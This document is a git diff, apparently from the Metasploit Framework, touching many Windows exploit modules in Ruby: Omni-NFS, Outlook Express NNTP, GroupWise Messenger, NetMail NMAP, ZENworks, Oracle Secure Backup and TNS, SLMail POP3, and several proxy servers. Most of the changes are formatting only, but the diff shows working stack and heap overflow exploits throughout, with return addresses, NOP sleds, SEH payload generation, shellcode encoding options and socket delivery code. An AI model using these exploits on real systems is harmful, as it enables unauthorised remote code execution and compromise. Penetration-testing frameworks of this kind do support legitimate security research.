[0x00000000].pack('V') + req_dos = [0x00008daa].pack('V') + [0x40000000].pack('V') + req_dos << [0x00000008].pack('V') + [0x00000000].pack('V') req_dos << [0x00000000].pack('V') + [0x00000000].pack('V') - req_dos << [0x03010000].pack('V') + [0x00000001].pack('V') - req_dos << "\x00\x0F\xFF" + rand_text_alphanumeric(3917 - payload.encoded.length) - req_dos << make_nops(100) + payload.encoded + [target.ret].pack('V') + req_dos << [0x00000000].pack('V') + [0x00000000].pack('V') + req_dos << [0x03010000].pack('V') + [0x00000001].pack('V') + req_dos << "\x00\x0F\xFF" + rand_text_alphanumeric(3917 - payload.encoded.length) + req_dos << make_nops(100) + payload.encoded + [target.ret].pack('V') req_dos << make_nops(16) + [0xe8, -650].pack('CV') + rand_text_alphanumeric(1024) print_status("Trying target #{target.name}...") sock.put(req_uno) sock.put(req_dos) - + handler disconnect end diff --git a/modules/exploits/windows/nfs/xlink_nfsd.rb b/modules/exploits/windows/nfs/xlink_nfsd.rb index cb032b25a3..8f22c47e28 100644 --- a/modules/exploits/windows/nfs/xlink_nfsd.rb +++ b/modules/exploits/windows/nfs/xlink_nfsd.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -17,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Omni-NFS Server Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Xlink Omni-NFS Server 5.2 - When sending a specially crafted nfs packet, an attacker may be able - to execute arbitrary code. + When sending a specially crafted nfs packet, an attacker may be able + to execute arbitrary code. }, 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2006-5780' ], [ 'BID', '20941' ], [ 'URL', 'http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm' ], @@ -42,14 +46,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows 2000 SP4 English', { 'Ret' => 0x0040bb2e } ], + [ 'Windows 2000 SP4 English', { 'Ret' => 0x0040bb2e } ], ], 'Privileged' => true, 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 06 2006')) - register_options([Opt::RPORT(2049)], self.class) - + register_options([Opt::RPORT(2049)], self.class) end def exploit @@ -75,10 +78,10 @@ class Metasploit3 < Msf::Exploit::Remote pkt << buff[300,400] sploit = [pkt.length | 0x80000000].pack('N') + pkt - + print_status("Trying target #{target.name}...") sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/nntp/ms05_030_nntp.rb b/modules/exploits/windows/nntp/ms05_030_nntp.rb index 6518eb75ad..21f3dcd967 100644 --- a/modules/exploits/windows/nntp/ms05_030_nntp.rb +++ b/modules/exploits/windows/nntp/ms05_030_nntp.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -22,13 +20,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Microsoft Outlook Express NNTP Response Parsing Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the news reader of Microsoft - Outlook Express. + Outlook Express. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2005-1213' ], [ 'OSVDB', '17306' ], [ 'BID', '13951' ], @@ -57,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The NNTPServer daemon port to listen on", 119 ]) ], self.class) end @@ -72,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote def on_client_data(client) return if ((p = regenerate_payload(client)) == nil) - filler = "215 list\r\n" + "group " + filler = "215 list\r\n" + "group " filler << rand_text_english(target['Offset']) seh = generate_seh_payload(target.ret) sploit = filler + seh + " 1 y\r\n\.\r\n" diff --git a/modules/exploits/windows/novell/groupwisemessenger_client.rb b/modules/exploits/windows/novell/groupwisemessenger_client.rb index 292fcd0d44..2bfc2b2c5e 100644 --- a/modules/exploits/windows/novell/groupwisemessenger_client.rb +++ b/modules/exploits/windows/novell/groupwisemessenger_client.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -21,13 +19,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Novell GroupWise Messenger Client Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Novell's GroupWise Messenger Client. - By sending a specially crafted HTTP response, an attacker may be able to execute - arbitrary code. + By sending a specially crafted HTTP response, an attacker may be able to execute + arbitrary code. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-2703' ], [ 'OSVDB', '46041' ], @@ -42,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 750, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", - 'DisableNops' => 'True', + 'DisableNops' => 'True', 'StackAdjustment' => -3500, 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, @@ -51,14 +49,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'Novell GroupWise Messenger 2.0 Client', { 'Ret' => 0x502de115 } ], - [ 'Novell GroupWise Messenger 1.0 Client', { 'Ret' => 0x1000e105 } ], + [ 'Novell GroupWise Messenger 1.0 Client', { 'Ret' => 0x1000e105 } ], ], 'Privileged' => false, 'DisclosureDate' => 'July 2 2008', 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 8300 ]) ], self.class) end @@ -68,13 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote client.get_once - date = Time.gm(2008,nil,nil,nil,nil,nil) + date = Time.gm(2008,nil,nil,nil,nil,nil) rand_1 = rand_text_english(5) rand_2 = rand_text_english(4) rand_3 = rand_text_english(rand(8) + 1) rand_4 = rand_text_alpha_upper(8) rand_5 = rand_text_english(3) - + res = "HTTP/1.0 200\r\n" res << "Date: #{date}\r\n" res << "Pragma: no-cache\r\n" @@ -94,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote res << "\0\n\0\0\0Client \0\n\0\r\0\0\0nnmLastLogin\0\13\0\0\x001200112090\0\t\0\30\0\0\0" res << "NM_A_FA_CLIENT_SETTINGS\0\1\0\0\0\n\0\21\0\0\0Novell.AskToSave" res << "\0\2\0\0\x001\0\t\0\e\0\0\0NM_A_FA_INFO_DISPLAY_ARRAY" - res << "\0\1\0\0\0\n\0\27\0\0\0Internet EMail Address\0\26\0\0\0#{rand_1}\@#{rand_4}.#{rand_5}.xx" + res << "\0\1\0\0\0\n\0\27\0\0\0Internet EMail Address\0\26\0\0\0#{rand_1}\@#{rand_4}.#{rand_5}.xx" res << "\0\b\0\16\0\0\0NM_A_UD_BUILD\0\a\0\0\0\n\0\13\0\0\0NM_A_SZ_DN\x001\0\0\0" res << "CN=ISR000,OU=IT,OU=ISR_,OU=BA,OU=AR,O=#{rand_4}XX" res << "\0\t\0\24\0\0\0NM_A_FA_AU_SETTINGS\0\1\0\0\0\n\0\22\0\0\0" diff --git a/modules/exploits/windows/novell/nmap_stor.rb b/modules/exploits/windows/novell/nmap_stor.rb index 149e811c21..58651d1a32 100644 --- a/modules/exploits/windows/novell/nmap_stor.rb +++ b/modules/exploits/windows/novell/nmap_stor.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -7,12 +17,12 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell NetMail <= 3.52d NMAP STOR Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Novell's Netmail 3.52 NMAP STOR - verb. By sending an overly long string, an attacker can overwrite the - buffer and control program execution. + This module exploits a stack overflow in Novell's Netmail 3.52 NMAP STOR + verb. By sending an overly long string, an attacker can overwrite the + buffer and control program execution. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -35,17 +45,16 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - ['Windows 2000 Pro SP4 English', { 'Ret' => 0x7cdc97fb }], + ['Windows 2000 Pro SP4 English', { 'Ret' => 0x7cdc97fb }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 23 2006')) - register_options([Opt::RPORT(689)], self.class) - + register_options([Opt::RPORT(689)], self.class) end - + def exploit connect sock.get_once @@ -54,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(auth + "\r\n") res = sock.get_once - + sploit = "STOR " + rand_text_english(253) + [ target.ret ].pack('V') - sploit << " " + rand_text_english(20) + "\r\n" + payload.encoded + sploit << " " + rand_text_english(20) + "\r\n" + payload.encoded if (res =~ /1000/) print_status("Trying target #{target.name}...") @@ -64,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote else print_status("Not in Trusted Hosts.") end - + handler disconnect end diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index b0571d6b35..6ae616047f 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb @@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell ZENworks 6.5 Desktop/Server Management Overflow', 'Description' => %q{ - This module exploits a heap overflow in the Novell ZENworks + This module exploits a heap overflow in the Novell ZENworks Desktop Management agent. This vulnerability was discovered by Alex Wheeler. - }, 'Author' => [ 'anonymous' ], 'License' => BSD_LICENSE, @@ -44,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ [ 'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent', @@ -60,37 +57,37 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect - + hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77" print_status("Sending version identification") sock.put(hello) - + pad = Rex::Text.rand_text_alphanumeric(6, payload_badchars) ident = sock.get_once if !(ident and ident.length == 16) print_status("Failed to receive agent version identification") return end - + print_status("Received agent version identification") print_status("Sending client acknowledgement") sock.put("\x00\x01") - + # Stack overflow in ZenRem32.exe / ZENworks Server Management sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01") - + ack = sock.get_once sock.put("\x00\x01") sock.put("\x00\x02") - + print_status("Sending final payload") sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V')) - + print_status("Overflow request sent, sleeping for four seconds") sleep(4) - + handler disconnect end - + end diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb index 32b72295ec..5e5b79f3b4 100644 --- a/modules/exploits/windows/oracle/osb_ndmp_auth.rb +++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -11,14 +15,14 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::NDMP - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow', 'Description' => %q{ The module exploits a stack overflow in Oracle Secure Backup. - When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet, - an attacker may be able to execute arbitrary code. + When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet, + an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -42,26 +46,26 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, - 'Targets' => + 'Targets' => [ [ 'Oracle Secure Backup 10.1.0.3 (Windows 2003 SP0/Windows XP SP3)', { 'Ret' => 0x608f5a28 } ], # oracore10.dll ], - 'DisclosureDate' => 'Jan 14 2009', + 'DisclosureDate' => 'Jan 14 2009', 'DefaultTarget' => 0)) - - register_options([Opt::RPORT(10000)], self.class) + + register_options([Opt::RPORT(10000)], self.class) end def exploit connect - + print_status("Trying target #{target.name}...") - + ndmp_recv() - + username = rand_text_alphanumeric(3789 - payload.encoded.length) - username << payload.encoded + Rex::Arch::X86.jmp_short(6) - username << make_nops(2) + [target.ret].pack('V') + [0xe8, -850].pack('CV') + username << payload.encoded + Rex::Arch::X86.jmp_short(6) + username << make_nops(2) + [target.ret].pack('V') + [0xe8, -850].pack('CV') username << rand_text_alphanumeric(5000 - 3793 - payload.encoded.length - 8 - 5) password = rand_text_alphanumeric(rand(25) + 1) @@ -82,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending authentication request...") ndmp_send(auth) - + handler disconnect end diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 4852c7ba2b..9ec13afbc5 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,16 +20,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow.', 'Description' => %q{ - This module exploits a stack overflow in Oracle 8i. When + This module exploits a stack overflow in Oracle 8i. When sending a specially crafted packet containing a overly long - ARGUMENTS string to the TNS service, an attacker may be able + ARGUMENTS string to the TNS service, an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2001-0499' ], [ 'OSVDB', '9427'], [ 'BID', '2941' ], @@ -50,23 +54,22 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 28 2001')) - register_options([Opt::RPORT(1521)], self.class) - + register_options([Opt::RPORT(1521)], self.class) end def check connect version = "(CONNECT_DATA=(COMMAND=VERSION))" - + pkt = tns_packet(version) sock.put(pkt) - + sock.get_once res = sock.get_once(-1, 1) - + disconnect if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) @@ -83,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(966) sploit = "(CONNECT_DATA=(COMMAND=STATUS)(ARGUMENTS=#{buff}))" - + pkt = tns_packet(sploit) print_status("Trying target #{target.name}...") diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index ea86ef2c92..2ecb752ea1 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -69,8 +69,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 20 2009')) - register_options([Opt::RPORT(1521)], self.class) - + register_options( + [ + Opt::RPORT(1521) + ], self.class) end @@ -90,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote mytarget = nil if target.name =~ /Automatic/ - print_status("Attempting automatic target detection...") + print_status("Attempting automatic target detection...") version = tns_version if (not version) @@ -104,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote end if (not mytarget) - raise RuntimeError, "Unable to automatically detect the target" + raise RuntimeError, "Unable to automatically detect the target" end print_status("Automatically detected target \"#{mytarget.name}\"") diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index bab46952e5..6e16a9545b 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Oracle TNS Listener SERVICE_NAME Buffer Overflow.', 'Description' => %q{ - This module exploits a stack overflow in Oracle. When - sending a specially crafted packet containing a long SERVICE_NAME + This module exploits a stack overflow in Oracle. When + sending a specially crafted packet containing a long SERVICE_NAME to the TNS service, an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2002-0965'], [ 'OSVDB', '5041'], [ 'BID', '4845'], @@ -51,46 +55,42 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'May 27 2002')) - register_options([Opt::RPORT(1521)], self.class) - + register_options([Opt::RPORT(1521)], self.class) end def check connect version = "(CONNECT_DATA=(COMMAND=VERSION))" - pkt = tns_packet(version) - sock.put(pkt) - - sock.get_once + sock.get_once res = sock.get_once(-1, 1) - + disconnect - if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe + if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe end def exploit connect - buff = rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded - buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') - buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400) + buff = rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded + buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') + buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400) - sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))" - - pkt = tns_packet(sploit) + sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))" - print_status("Trying target #{target.name}...") - sock.put(pkt) + pkt = tns_packet(sploit) - handler + print_status("Trying target #{target.name}...") + sock.put(pkt) + + handler disconnect end diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index 726fe1cd85..0bb65be4bf 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb @@ -3,52 +3,50 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Seattle Lab Mail 5.5 POP3 Buffer Overflow', 'Description' => %q{ - There exists an unauthenticated buffer overflow vulnerability - in the POP3 server of Seattle Lab Mail 5.5 when sending a password - with excessive length. + There exists an unauthenticated buffer overflow vulnerability + in the POP3 server of Seattle Lab Mail 5.5 when sending a password + with excessive length. - Successful exploitation should not crash either the - service or the server; however, after initial use the - port cannot be reused for successive exploitation until - the service has been restarted. Consider using a command - execution payload following the bind shell to restart - the service if you need to reuse the same port. + Successful exploitation should not crash either the + service or the server; however, after initial use the + port cannot be reused for successive exploitation until + the service has been restarted. Consider using a command + execution payload following the bind shell to restart + the service if you need to reuse the same port. - The overflow appears to occur in the debugging/error reporting - section of the slmail.exe executable, and there are multiple - offsets that will lead to successful exploitation. This exploit - uses 2606, the offset that creates the smallest overall payload. - The other offset is 4654. + The overflow appears to occur in the debugging/error reporting + section of the slmail.exe executable, and there are multiple + offsets that will lead to successful exploitation. This exploit + uses 2606, the offset that creates the smallest overall payload. + The other offset is 4654. - The return address is overwritten with a "jmp esp" call from the - application library SLMFC.DLL found in %SYSTEM%\\system32\\. This - return address works against all version of Windows and service packs. + The return address is overwritten with a "jmp esp" call from the + application library SLMFC.DLL found in %SYSTEM%\\system32\\. This + return address works against all version of Windows and service packs. - The last modification date on the library is dated 06/02/99. Assuming - that the code where the overflow occurs has not changed in some time, - prior version of SLMail may also be vulnerable with this exploit. The - author has not been able to acquire older versions of SLMail for - testing purposes. Please let us know if you were able to get this - exploit working against other SLMail versions. + The last modification date on the library is dated 06/02/99. Assuming + that the code where the overflow occurs has not changed in some time, + prior version of SLMail may also be vulnerable with this exploit. The + author has not been able to acquire older versions of SLMail for + testing purposes. Please let us know if you were able to get this + exploit working against other SLMail versions. }, 'Author' => 'stinko', 'License' => MSF_LICENSE, @@ -63,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 600, @@ -71,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote 'MinNops' => 100, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows NT/2000/XP/2003 (SLMail 5.5)', { 'Ret' => 0x5f4a358f, 'Offset' => 2606 } ] ], @@ -84,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - + def exploit connect diff --git a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb index a96c328119..0d042f36f4 100644 --- a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb +++ b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -23,20 +21,19 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Blue Coat WinProxy Host Header Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the Blue Coat Systems WinProxy + This module exploits a buffer overflow in the Blue Coat Systems WinProxy service by sending a long port value for the Host header in a HTTP request. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2005-4085'], ['OSVDB', '22238'], ['BID', '16147'], ['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'], - ], 'DefaultOptions' => { @@ -53,17 +50,14 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll ], - 'Privileged' => true, - 'DisclosureDate' => 'January 5 2005', - 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(80) - ], self.class) + register_options( + [ + Opt::RPORT(80) + ], self.class) end @@ -72,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") - sploit = "GET / HTTP/1.1" + "\r\n" + sploit = "GET / HTTP/1.1" + "\r\n" sploit += "Host: 127.0.0.1:" sploit += rand_text_english(31, payload_badchars) seh = generate_seh_payload(target.ret) @@ -81,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(sploit) sock.get_once(-1, 3) - + handler disconnect end diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index 14b72d7b1d..f3dd2cd880 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -21,26 +20,26 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow', 'Description' => %q{ - This module exploits the YoungZSoft CCProxy <= v6.2 suite - Telnet service. The stack is overwritten when sending an overly - long address to the 'ping' command. + This module exploits the YoungZSoft CCProxy <= v6.2 suite + Telnet service. The stack is overwritten when sending an overly + long address to the 'ping' command. }, 'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => - [ - [ 'CVE', '2004-2416' ], - [ 'OSVDB', '11593' ], - [ 'BID', '11666 ' ], - [ 'URL', 'http://milw0rm.com/exploits/621' ], - ], + [ + [ 'CVE', '2004-2416' ], + [ 'OSVDB', '11593' ], + [ 'BID', '11666 ' ], + [ 'URL', 'http://milw0rm.com/exploits/621' ], + ], 'Privileged' => false, 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, + { + 'EXITFUNC' => 'thread', + }, 'Payload' => { 'Space' => 1012, @@ -48,17 +47,17 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => ['win'], 'Targets' => - [ - # Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN. - [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll - [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll - [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll - [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll - [ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll - ], + [ + # Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN. + [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll + [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll + [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll + [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll + [ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll + ], 'DisclosureDate' => 'Nov 11 2004')) - register_options( + register_options( [ Opt::RPORT(23), ], self.class) @@ -86,4 +85,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index 0ced5800cf..cc7229d9ad 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -30,9 +28,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ - ['CVE', '2004-0326'], + 'References' => + [ + ['CVE', '2004-0326'], ['OSVDB', '4027'], ['BID', '9716'], ], @@ -47,22 +45,18 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => [ [ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 